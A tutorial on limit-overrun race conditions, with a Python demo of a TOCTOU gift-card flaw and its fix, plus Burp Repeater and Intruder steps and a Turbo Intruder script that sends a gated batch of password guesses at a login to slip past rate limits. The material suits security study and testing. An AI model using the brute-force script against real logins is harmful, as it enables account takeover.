Limit Overrun Race Conditions

The most well-known type of race condition lets you exceed a limit that the application's business logic is supposed to enforce.

There are many variations of this kind of attack, including:

  • Redeeming a gift card multiple times

  • Rating a product multiple times

  • Withdrawing or transferring cash in excess of your account balance

  • Reusing a single CAPTCHA solution

  • Bypassing an anti-brute-force rate limit

Limit overruns are a subtype of so-called "time-of-check to time-of-use" (TOCTOU) flaws: the application checks a condition (the card is unused, the balance is sufficient, the rate limit has not been hit) and then acts on it later, so parallel requests that all pass the check before any of them updates the state get through together.
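To make the TOCTOU window concrete, here is an added example (not part of the original page) that models gift-card redemption in memory: a vulnerable version that checks the "redeemed" flag and updates it in two separate steps, and a fixed version that does both under one lock. Names such as GiftCard and run_race are constructed for this illustration, and a threading.Barrier stands in for the simultaneous arrival that a parallel request group produces.

```python
import threading


class GiftCard:
    """In-memory model of a single-use gift card (constructed example)."""

    def __init__(self, value=10):
        self.value = value
        self.redeemed = False
        self.credited = 0  # total value credited to the user's wallet
        self.lock = threading.Lock()

    def redeem_vulnerable(self, barrier):
        # Time-of-check: read the flag ...
        if self.redeemed:
            return False
        # The barrier models the gap between check and update; in a real
        # app it is the DB round-trip that parallel requests all land inside.
        barrier.wait()
        # Time-of-use: every request that passed the check now credits.
        self.redeemed = True
        self.credited += self.value
        return True

    def redeem_fixed(self, barrier):
        barrier.wait()  # requests still arrive together ...
        # ... but check and update are one atomic step, the in-memory
        # equivalent of UPDATE cards SET redeemed=1 WHERE id=? AND redeemed=0
        with self.lock:
            if self.redeemed:
                return False
            self.redeemed = True
            self.credited += self.value
            return True


def run_race(method_name, requests=20):
    """Fire `requests` concurrent redemptions; return (successes, credited)."""
    card = GiftCard()
    barrier = threading.Barrier(requests)
    results = []  # list.append is atomic in CPython, safe across threads
    redeem = getattr(card, method_name)
    threads = [threading.Thread(target=lambda: results.append(redeem(barrier)))
               for _ in range(requests)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results), card.credited


if __name__ == "__main__":
    print(run_race("redeem_vulnerable"), run_race("redeem_fixed"))  # (20, 200) (1, 10)
```

The vulnerable version credits the card once per request because all twenty requests pass the check before any of them sets the flag; the fixed version credits it exactly once regardless of how many requests arrive at the same instant.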

Detecting and Exploiting Limit Overrun (Repeater)

The process of detecting and exploiting limit overrun race conditions is relatively simple. In high-level terms, all you need to do is:

  1. Identify a single-use or rate-limited endpoint that has some kind of security impact or other useful purpose.

  2. Issue multiple requests to this endpoint in quick succession to see if you can overrun this limit.

Sending a Group of Requests (Repeater)

  • Right-click the request and send it to Repeater

  • In the Repeater tab, right-click the request and send it to Repeater again, or use Ctrl+R (you need to create 15 to 20 copies of the request)

  • Now click the + icon beside the last request tab

  • Select Create tab group

  • Select all the requests

  • Give it a name

  • Select a color

  • Click on Create

  • Expand the send button

  • Select Send group in parallel option

  • Click on the Send group (parallel button)

Bypassing Rate Limits (Anti-Brute-Force Mechanism)

  • Send the login request to Intruder

  • Set the payload position on the password field

  • In the Payloads tab, enter some default passwords

  • Switch to the Resource pool tab

  • Select the Custom resource pool option

  • Click the Start attack button

  • Look for a 302 response

Using Turbo Intruder

  • Send the POST request to Repeater

  • Right-click the request in Repeater

  • Click Extensions -> Send to Turbo Intruder

  • Replace the password with the %s placeholder in the request window

  • Paste the code below into the Python script window

Make sure that you have copied the passwords to the clipboard beforehand; the script reads them from there.

def queueRequests(target, wordlists):

    # if the target supports HTTP/2, use engine=Engine.BURP2 to trigger the single-packet attack
    # if they only support HTTP/1, use Engine.THREADED or Engine.BURP instead
    # for more information, check out https://portswigger.net/research/smashing-the-state-machine
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,
                           engine=Engine.BURP2
                           )

    # the 'gate' argument withholds part of each request until openGate is invoked
    # if you see a negative timestamp, the server responded before the request was complete

    # the password list is read from the clipboard, so copy it before starting
    passwords = wordlists.clipboard
    for password in passwords:
        engine.queue(target.req, password, gate='1')

    # once every request tagged with gate '1' has been queued,
    # invoke engine.openGate() to send them in sync
    engine.openGate('1')


def handleResponse(req, interesting):
    table.add(req)

  • Click the Attack button

  • Look for a 302 status code
